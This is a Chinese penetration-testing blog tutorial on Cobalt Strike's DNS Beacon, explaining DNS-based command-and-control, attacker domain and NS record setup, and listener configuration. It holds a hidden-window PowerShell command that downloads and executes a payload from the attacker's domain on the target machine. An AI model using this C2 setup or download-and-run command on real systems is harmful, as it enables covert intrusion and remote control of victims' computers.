150.网络安全渗透测试—[Cobalt Strike系列]—[DNS Beacon原理/实战测试]
我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!!
文章目录
- 一、DNS Beacon原理
- 1、DNS Beacon简介
- 2、DSN Beacon工作原理
- 二、DNS Beacon实战测试
- 1、实战测试前提
- 2、实战测试过程
一、DNS Beacon原理
1、DNS Beacon简介
(1)DNS 木马优缺点
dns木马因为隐蔽性好,在受害者不会开放任何端口的时候可以规避防火墙协议,因为走的是53端口 (服务器),防火墙不会拦截,缺点响应慢。
(2)DNS Beacon的类型
windows/beacon_dns/reserve_http (传输数据小)
有效载荷通过HTTP连接分阶段。当您创建此侦听器时,请注意您正在配置主机和端口Cobalt Strike将使用通过HTTP分阶段此有效负载。当您选择设置此有效负载时,Cobalt Strike在端口53上站起来的DNS服务器。
windows/beacon_dns/reverse_dns_txt (传输数据大)
有效负载使用DNS TXT记录下载和分级混合HTTP和DNS beacon。当您创建此侦听器时,请注意,您正在配置该有效负载将用于HTTP通信的端口。再次,Cobalt Strike知道在53端口站起来一个DNS服务器。
beacon_dns/reserve_http(支持命令切换到该模式:mode dns)
将http通信方式,改为了使用dns的a记录方式进行通信。速度较慢,但非常隐蔽,推荐使用!
beacon_dns/reserve_dns_txt(支持命令切换到该模式:mode dns-txt)
同上,只是改为使用dns的txt方式进行通信,传输的数据量更大,推荐使用!
2、DSN Beacon工作原理
(1)流程图
从上图中可以看到,当我们给CS的team server搞了一个域名并配置相应的A记录以及指向自身A记录的NS记录后,DNS请求就会被迭代查询的本地DNS服务器一步一步引向team server,team server收到了服务端的特殊请求后便可以用封装的加密通信协议与之交互了。
//A记录:用来指定主机名或者是域名对应的IP地址记录。是DNS服务器中告诉用户该域名指向哪个IP地址的记录。
//NS记录:是域名服务器记录,用来指定由哪台服务器对该域名进行解析。
(2)具体分析:当靶机在运行了payload后,会对域名123456.ns1.clqwsn.xyz进行解析
- 靶机首先会去查询本地的hosts文件是否存在123456.ns1.clqwsn.xyz的记录,若没有则返回;
- 靶机接着从本地DNS服务器查询,若本地DNS服务器的缓存中没有记录,则会开始进行迭代查询;
- 本地DNS服务器首先会向根域名服务器发起询问,问你知道123456.ns1.clqwsn.xyz吗,然而根域服务器说"我不知道,但是.xyz服务器可能会知道";
- 本地DNS服务器接着去问.xyz服务器, .xyz服务器说:"我也不知道,但是clqwsn.xyz服务器可能会知道;
- 本地DNS服务器再去问clqwsn.xyz服务器,clqwsn.xyz服务器又说:"我同样不知道,ns1.clqwsn.xyz服务器可能会知道;
- 最终本地DNS服务器访问了ns1.clqwsn.xyz域名服务器,但是ns1.clqwsn.xyz的ns记录指向了cs.clqwsn.xyz域名服务器, 该cs.clqwsn.xyz是我们的team server服务器,team server开启了53服务并查询到了123456.ns1.clqwsn.xyz的响应值, 随后ns1.clqwsn.xyz服务器将响应值返回给本地DNS服务器,本地DNS服务器再返回给靶机。
二、DNS Beacon实战测试
1、实战测试前提
(1)一台virmach购买的公网VPS:x.x.x.x
(2)一个godaddy申请的域名:clqwsn.xyz
第一步:在域名管理处,创建一个A记录指向我们的公网team server主机,即cs.clqwsn.xyz 指向 x.x.x.x;
第二步:创建两个ns记录(NS记录是指定由哪个DNS服务器解析你的域名)指向自身的A记录【让自己充当dns服务器】, 即分别是ns1.clqwsn.xyz和ns2.clqwsn.xyz指向cs.clqwsn.xyz。
//如下图所示:
2、实战测试过程
(1)公网主机开启team server:./teamserver x.x.x.x 123456
//如下图所示:x.x.x.x是我们的公网vps的IP
(2)真机充当攻击者团队成员,去连接team server:双击cobaltstrike.bat
(3)创建监听器,开启team server的侦听
//如下图所示:此处host填写公网IP对应的域名cs.clqwn.xyz
//如下图所示:传输地址填写ns1.clqwsn.xyz,ns2.clqwsn.xyz
(4)nslookup测试dns服务:nslookup 123456.ns1.clqwsn.xyz
//如下图所示:只要监听器配置正确,则会返回非权威回答的0.0.0.0,若没有配置或不正确则会显示超时。
(5)dig +trace测试dns服务:
//如下图所示:该命令其实是想知道完整的域名迭代查询过程
(6)生成payload攻击载荷:脚本web传递
//如下图所示:host填写cs.clqwsn.xyz
//如下图所示:保存下来payloadpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://cs.clqwsn.xyz:80/a'))"
(7)靶机运行payload:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://cs.clqwsn.xyz:80/a'))"
//如下图所示:我们在靶机运行后,在cs的web日志和视图可以看到靶机已上线
(8)靶机上线后,右键视图下的靶机,单击beacon,进入beacon,执行checkin
强制被控端回连(受害人主动请求)
//如下图所示:我们需要等待一会
//如下图所示:等待一两分钟后,靶机上线
(9)转换协议:mode [http | dns | dns-txt]
略
150.网络安全渗透测试—[Cobalt Strike系列]—[DNS Beacon原理/实战测试]相关推荐
- 156-161.网络安全渗透测试—[Cobalt Strike系列]—[内网渗透之Windos域环境的搭建]
我认为,无论是学习安全还是从事安全的人多多少少都有些许的情怀和使命感!!! 文章目录 1.Active Directory 活动目录的概念 2.Active Directory 活动目录的作用 3.A ...
- 162.网络安全渗透测试—[Cobalt Strike系列]—[Veil免杀]
文章目录 1 Veil的使用 2 生成有效载荷payload 3 Veil免杀过程 4 测试免杀 1 Veil的使用 (1)Veil主要用于生成:免杀payload (2)下载地址:https://g ...
- 内网渗透工具Cobalt Strike 基础使用
Cobalt Strike:C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透. Cobalt Strike一款GUI的框架式渗透工具,集成了端口转发.服务扫描,自动 ...
- [工具]渗透神器Cobalt Strike 3.13 TeamServer for Windows
Cobalt Strike 3.13 TeamServer for Windows 0x001 环境 CS 3.12 或 3.13 Kali或Win最好安装jdk1.8.5或之后版本 设置环境变量,如 ...
- [渗透测试]Cobalt Strike如何上线linux主机
环境配置 CobaltStrike 4.3 CrossC2 Kali(CS服务端) Kali(CS客户端) Kali(受害机) Cross C2简介 Cross C2是一个支持Linux & ...
- Cobalt Strike 之团队服务器的搭建与DNS通讯演示
luom · 2014/04/25 12:07 0x00 背景 Cobalt Strike 一款以metasploit为基础的GUI的框框架式渗透工具,Armitage的商业版,集成了端口发.服务扫描 ...
- cobalt strike 的基础使用
cobalt strike 的基础使用 本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源自于靶场练习,仅供学习参考 ...
- cobaltstrike扩展_Cobalt Strike系列教程第七章:提权与横向移动
Cobalt Strike系列教程分享如约而至,新关注的小伙伴可以先回顾一下前面的内容: Cobalt Strike系列教程第一章:简介与安装 Cobalt Strike系列教程第二章:Beacon详 ...
- DAY41:Cobalt Strike 工具使用
DAY41:Cobalt Strike 工具使用 1.Cobalt Strike 概述 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器. 自 3.0 以后已 ...
最新文章
- zabbix的日常监控-自动发现端口并监测(服务器开启的所有端口或监控指定端口)(十三)...
- 深入理解Python中的元类(metaclass)
- 中科院C语言应聘机试编程题6,中科院计算所保研笔试+机试+面试经验分享
- 酷享CMS企业级授权系统源码 有工单系统
- Flutter进阶第6篇: 获取设备信息 以及 使用高德Api获取地理位置
- Linux文章大合集
- JS推断浏览器类型与版本号
- arcgis api for js 下载(各版本最全面的地址)
- 从零开始的FPGA学习5-同步复位D触发器、异步复位D触发器
- Python自动登录QQ空间
- Php计算圆柱的表面积和体积,圆柱体的面积计算公式
- 苹果与深圳唯冠的未了之战
- 04 - SSH攻击Linux服务器(简单)
- php解压有密码的zip,linux下解压有密码的rar压缩包的方法
- Android移动应用开发学习——实现简单新闻APP
- 华为主题引擎怎么下载_华为搜索引擎app
- AndroidStudio如何删除Modle
- 背出来matlab就无敌了
- CTF-网络信息安全攻防学习平台(注入关)
- Web日志安全分析浅谈
热门文章
- MATLAB - Modbus TCP客户端的使用
- Java jdk14.0.1安装简单步骤
- SELECT后面有自定义函数的优化方法
- 10位、13位时间戳转换成日期格式JS
- stm32H743基于CubeMX配置为双ADC多通道DMA规则采样
- automake,autoconf使用详解
- [设计模式]单例模式的几种不同写法比较
- 只需一次向前推导,深度神经网络可视化方法来了!(ECCVW 2022)
- 国产音频压缩格式JLM——JLM音频播放
- Mac解压Rar,7z,Zip,Winrar?Mac解压缩软件测评,推荐Mac上免费好用的解压软件,高效解压神器帮您解决苹果电脑的解压缩问题